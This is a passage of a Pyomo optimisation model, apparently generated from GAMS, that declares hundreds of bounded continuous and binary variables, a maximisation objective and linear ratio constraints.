Var(within=Reals,bounds=(0,None),initialize=0) m.x980 = Var(within=Reals,bounds=(0,20),initialize=0) m.x981 = Var(within=Reals,bounds=(0,20),initialize=0) m.x982 = Var(within=Reals,bounds=(0,20),initialize=0) m.x983 = Var(within=Reals,bounds=(0,20),initialize=0) m.x984 = Var(within=Reals,bounds=(0,20),initialize=0) m.x985 = Var(within=Reals,bounds=(0,20),initialize=0) m.x986 = Var(within=Reals,bounds=(0,None),initialize=0) m.x987 = Var(within=Reals,bounds=(0,None),initialize=0) 
m.x988 = Var(within=Reals,bounds=(0,None),initialize=0) m.x989 = Var(within=Reals,bounds=(0,None),initialize=0) m.x990 = Var(within=Reals,bounds=(0,None),initialize=0) m.x991 = Var(within=Reals,bounds=(0,None),initialize=0) m.x992 = Var(within=Reals,bounds=(0,None),initialize=0) m.x993 = Var(within=Reals,bounds=(0,None),initialize=0) m.x994 = Var(within=Reals,bounds=(0,None),initialize=0) m.x995 = Var(within=Reals,bounds=(0,None),initialize=0) m.x996 = Var(within=Reals,bounds=(0,None),initialize=0) m.x997 = Var(within=Reals,bounds=(0,None),initialize=0) m.x998 = Var(within=Reals,bounds=(0,None),initialize=0) m.x999 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1000 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1001 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1002 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1003 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1004 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1005 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1006 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1007 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1008 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1009 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1010 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1011 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1012 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1013 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1014 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1015 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1016 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1017 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1018 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1019 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1020 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1021 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1022 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1023 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x1024 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1025 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1026 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1027 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1028 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1029 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1030 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1031 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1032 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1033 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1034 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1035 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1036 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1037 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1038 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1039 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1040 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1041 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1042 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1043 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1044 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1045 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1046 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1047 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1048 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1049 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1050 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1051 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1052 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1053 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1054 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1055 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1056 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1057 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1058 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x1059 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1060 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1061 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1062 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1063 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1064 = Var(within=Reals,bounds=(0,30),initialize=0) m.x1065 = Var(within=Reals,bounds=(0,30),initialize=0) m.x1066 = Var(within=Reals,bounds=(0,30),initialize=0) m.x1067 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1068 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1069 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1070 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1071 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1072 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1073 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1074 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1075 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1076 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1077 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1078 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1079 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1080 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1081 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1082 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1083 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1084 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1085 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1086 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1087 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1088 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1089 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1090 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1091 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1092 = Var(within=Reals,bounds=(0,None),initialize=0) m.x1093 = 
Var(within=Reals, bounds=(0, None), initialize=0)
# x1094..x1489: nonnegative continuous variables.  The GAMS converter
# emitted one assignment per variable; the loop below builds the same
# components with the same names, domains, bounds and initial values.
# setattr(m, 'x%d' % i, ...) is equivalent to m.x<i> = Var(...) on a
# ConcreteModel (both go through component assignment).
for _i in range(1094, 1490):
    setattr(m, 'x%d' % _i, Var(within=Reals, bounds=(0, None), initialize=0))
# b1490..b1513: binary decision variables.
for _i in range(1490, 1514):
    setattr(m, 'b%d' % _i, Var(within=Binary, bounds=(0, 1), initialize=0))
m.b1514 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1515 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1516 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1517 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1518 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1519 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1520 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1521 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1522 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1523 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1524 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1525 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1526 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1527 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1528 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1529 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1530 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1531 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1532 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1533 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1534 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1535 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1536 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1537 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1538 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1539 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1540 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1541 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1542 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1543 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1544 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1545 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1546 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1547 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1548 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1549 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1550 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b1551 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1552 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1553 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1554 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1555 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1556 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1557 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1558 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1559 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1560 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1561 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1562 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1563 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1564 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1565 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1566 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1567 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1568 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1569 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1570 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1571 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1572 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1573 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1574 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1575 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1576 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1577 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1578 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1579 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1580 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1581 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1582 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1583 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1584 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1585 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1586 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b1587 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1588 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1589 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1590 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1591 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1592 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1593 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1594 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1595 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1596 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1597 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1598 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1599 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1600 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1601 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1602 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1603 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1604 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1605 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1606 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1607 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1608 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1609 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1610 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1611 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1612 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1613 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1614 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1615 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1616 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1617 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1618 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1619 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1620 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1621 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1622 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b1623 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1624 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1625 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1626 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1627 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1628 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1629 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1630 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1631 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1632 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1633 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1634 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1635 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1636 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1637 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1638 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1639 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1640 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1641 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1642 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1643 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1644 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1645 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1646 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1647 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1648 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1649 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1650 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1651 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1652 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1653 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1654 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1655 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1656 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1657 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1658 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b1659 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1660 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1661 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1662 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1663 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1664 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1665 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1666 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1667 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1668 = Var(within=Binary,bounds=(0,1),initialize=0) m.b1669 = Var(within=Binary,bounds=(0,1),initialize=0) m.x1670 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1671 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1672 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1673 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1674 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1675 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1676 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1677 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1678 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1679 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1680 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1681 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1682 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1683 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1684 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1685 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1686 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1687 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1688 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1689 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1690 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1691 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1692 = 
Var(within=Reals,bounds=(None,None),initialize=0) m.x1693 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1694 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1695 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1696 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1697 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1698 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1699 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1700 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1701 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1702 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1703 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1704 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1705 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1706 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1707 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1708 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1709 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1710 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1711 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1712 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1713 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1714 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1715 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1716 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1717 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1718 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1719 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1720 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1721 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1722 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1723 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1724 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1725 = 
Var(within=Reals,bounds=(None,None),initialize=0) m.x1726 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1727 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1728 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1729 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1730 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1731 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1732 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1733 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1734 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1735 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1736 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1737 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1738 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1739 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1740 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1741 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1742 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1743 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1744 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1745 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1746 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1747 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1748 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1749 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1750 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1751 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1752 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1753 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1754 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1755 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1756 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1757 = Var(within=Reals,bounds=(None,None),initialize=0) m.x1758 = 
Var(within=Reals,bounds=(None,None),initialize=0) m.x1759 = Var(within=Reals,bounds=(None,None),initialize=0) m.obj = Objective(expr= - 20*m.x2 - 17*m.x3 - 15*m.x4 - 20*m.x17 - 21*m.x18 - 19*m.x19 - 18*m.x29 - 20*m.x30 - 20*m.x31 - 16*m.x65 - 19*m.x66 - 17*m.x67 + 26*m.x77 + 31*m.x78 + 31*m.x79 + 30*m.x83 + 29*m.x84 + 37*m.x85 - 20*m.x86 - 18*m.x87 - 21*m.x88 + 2*m.x95 + 2*m.x96 + 2*m.x97 + 3*m.x98 + 2*m.x99 + 2*m.x100 + 3*m.x101 + 3*m.x102 + 3*m.x103 + 2*m.x104 + 2*m.x105 + 2*m.x106 - 6*m.b803 - 4*m.b804 - 3*m.b805 - 40*m.b806 - 35*m.b807 - 20*m.b808 - 46*m.b809 - 39*m.b810 - 23*m.b811 - 7*m.b815 - 4*m.b816 - 4*m.b817 - 30*m.b818 - 25*m.b819 - 20*m.b820 - 37*m.b821 - 29*m.b822 - 22*m.b823 - 7*m.b827 - 5*m.b828 - 3*m.b829 - 15*m.b830 - 5*m.b831 - 2*m.b832 - 22*m.b833 - 10*m.b834 - 5*m.b835 - 11*m.b839 - 8*m.b840 - 6*m.b841 - 13*m.b842 - 8*m.b843 - 3*m.b844 - 24*m.b845 - 16*m.b846 - 9*m.b847 - 10*m.b851 - 7*m.b852 - 6*m.b853 - 13*m.b854 - 8*m.b855 - 3*m.b856 - 23*m.b857 - 15*m.b858 - 9*m.b859 - 9*m.b863 - 9*m.b864 - 7*m.b865 - 30*m.b866 - 30*m.b867 - 25*m.b868 - 39*m.b869 - 39*m.b870 - 32*m.b871 - 8*m.b875 - 7*m.b876 - 7*m.b877 - 20*m.b878 - 15*m.b879 - 10*m.b880 - 28*m.b881 - 22*m.b882 - 17*m.b883 - 8*m.b887 - 6*m.b888 - 5*m.b889 - 15*m.b890 - 10*m.b891 - 6*m.b892 - 23*m.b893 - 16*m.b894 - 11*m.b895 - m.x896 - m.x897 - m.x898 + 5*m.x914 + 10*m.x915 + 5*m.x916 - 2*m.x929 - m.x930 - 2*m.x931 - 10*m.x980 - 5*m.x981 - 5*m.x982 - 5*m.x983 - 5*m.x984 - 5*m.x985 + 40*m.x1004 + 30*m.x1005 + 15*m.x1006 + 15*m.x1007 + 20*m.x1008 + 25*m.x1009 + 10*m.x1010 + 30*m.x1011 + 40*m.x1012 + 30*m.x1013 + 20*m.x1014 + 20*m.x1015 + 35*m.x1016 + 50*m.x1017 + 20*m.x1018 + 20*m.x1019 + 30*m.x1020 + 35*m.x1021 + 25*m.x1022 + 50*m.x1023 + 10*m.x1024 + 15*m.x1025 + 20*m.x1026 + 20*m.x1027 + 30*m.x1049 + 40*m.x1050 + 40*m.x1051 - m.x1064 - m.x1065 - m.x1066 + 80*m.x1088 + 90*m.x1089 + 120*m.x1090 + 285*m.x1091 + 390*m.x1092 + 350*m.x1093 + 290*m.x1094 + 405*m.x1095 + 190*m.x1096 + 280*m.x1097 
+ 400*m.x1098 + 430*m.x1099 + 290*m.x1100 + 300*m.x1101 + 240*m.x1102 + 350*m.x1103 + 250*m.x1104 + 300*m.x1105 - 5*m.b1580 - 4*m.b1581 - 6*m.b1582 - 8*m.b1583 - 7*m.b1584 - 6*m.b1585 - 6*m.b1586 - 9*m.b1587 - 4*m.b1588 - 10*m.b1589 - 9*m.b1590 - 5*m.b1591 - 6*m.b1592 - 10*m.b1593 - 6*m.b1594 - 7*m.b1595 - 7*m.b1596 - 4*m.b1597 - 4*m.b1598 - 3*m.b1599 - 2*m.b1600 - 5*m.b1601 - 6*m.b1602 - 7*m.b1603 - 2*m.b1604 - 5*m.b1605 - 2*m.b1606 - 4*m.b1607 - 7*m.b1608 - 4*m.b1609 - 3*m.b1610 - 9*m.b1611 - 3*m.b1612 - 7*m.b1613 - 2*m.b1614 - 9*m.b1615 - 3*m.b1616 - m.b1617 - 9*m.b1618 - 2*m.b1619 - 6*m.b1620 - 3*m.b1621 - 4*m.b1622 - 8*m.b1623 - m.b1624 - 2*m.b1625 - 5*m.b1626 - 2*m.b1627 - 3*m.b1628 - 4*m.b1629 - 3*m.b1630 - 5*m.b1631 - 7*m.b1632 - 6*m.b1633 - 2*m.b1634 - 8*m.b1635 - 4*m.b1636 - m.b1637 - 4*m.b1638 - m.b1639 - 2*m.b1640 - 5*m.b1641 - 2*m.b1642 - 9*m.b1643 - 2*m.b1644 - 9*m.b1645 - 5*m.b1646 - 8*m.b1647 - 4*m.b1648 - 2*m.b1649 - 3*m.b1650 - 8*m.b1651 - 10*m.b1652 - 6*m.b1653 - 3*m.b1654 - 4*m.b1655 - 8*m.b1656 - 7*m.b1657 - 7*m.b1658 - 3*m.b1659 - 9*m.b1660 - 4*m.b1661 - 8*m.b1662 - 6*m.b1663 - 2*m.b1664 - m.b1665 - 3*m.b1666 - 8*m.b1667 - 3*m.b1668 - 4*m.b1669 , sense=maximize) m.c2 = Constraint(expr= m.x2 - 0.2*m.x107 == 0) m.c3 = Constraint(expr= m.x3 - 0.2*m.x108 == 0) m.c4 = Constraint(expr= m.x4 - 0.2*m.x109 == 0) m.c5 = Constraint(expr= m.x5 - 0.2*m.x110 == 0) m.c6 = Constraint(expr= m.x6 - 0.2*m.x111 == 0) m.c7 = Constraint(expr= m.x7 - 0.2*m.x112 == 0) m.c8 = Constraint(expr= m.x8 - 0.2*m.x113 == 0) m.c9 = Constraint(expr= m.x9 - 0.2*m.x114 == 0) m.c10 = Constraint(expr= m.x10 - 0.2*m.x115 == 0) m.c11 = Constraint(expr= m.x11 - 0.2*m.x116 == 0) m.c12 = Constraint(expr= m.x12 - 0.2*m.x117 == 0) m.c13 = Constraint(expr= m.x13 - 0.2*m.x118 == 0) m.c14 = Constraint(expr= m.x14 - 0.2*m.x119 == 0) m.c15 = Constraint(expr= m.x15 - 0.2*m.x120 == 0) m.c16 = Constraint(expr= m.x16 - 0.2*m.x121 == 0) m.c17 = Constraint(expr= m.x17 - 0.5*m.x122 == 0) m.c18 = 
Constraint(expr= m.x18 - 0.5*m.x123 == 0) m.c19 = Constraint(expr= m.x19 - 0.5*m.x124 == 0) m.c20 = Constraint(expr= m.x20 - 0.5*m.x125 == 0) m.c21 = Constraint(expr= m.x21 - 0.5*m.x126 == 0) m.c22 = Constraint(expr= m.x22 - 0.5*m.x127 == 0) m.c23 = Constraint(expr= m.x23 - 0.7*m.x128 == 0) m.c24 = Constraint(expr= m.x24 - 0.7*m.x129 == 0) m.c25 = Constraint(expr= m.x25 - 0.7*m.x130 == 0) m.c26 = Constraint(expr= m.x26 - 0.7*m.x131 == 0) m.c27 = Constraint(expr= m.x27 - 0.7*m.x132 == 0) m.c28 = Constraint(expr= m.x28 - 0.7*m.x133 == 0) m.c29 = Constraint(expr= m.x29 - 1.2*m.x134 == 0) m.c30 = Constraint(expr= m.x30 - 1.2*m.x135 == 0) m.c31 = Constraint(expr= m.x31 - 1.2*m.x136 == 0) m.c32 = Constraint(expr= m.x32 - 1.2*m.x137 == 0) m.c33 = Constraint(expr= m.x33 - 1.2*m.x138 == 0) m.c34 = Constraint(expr= m.x34 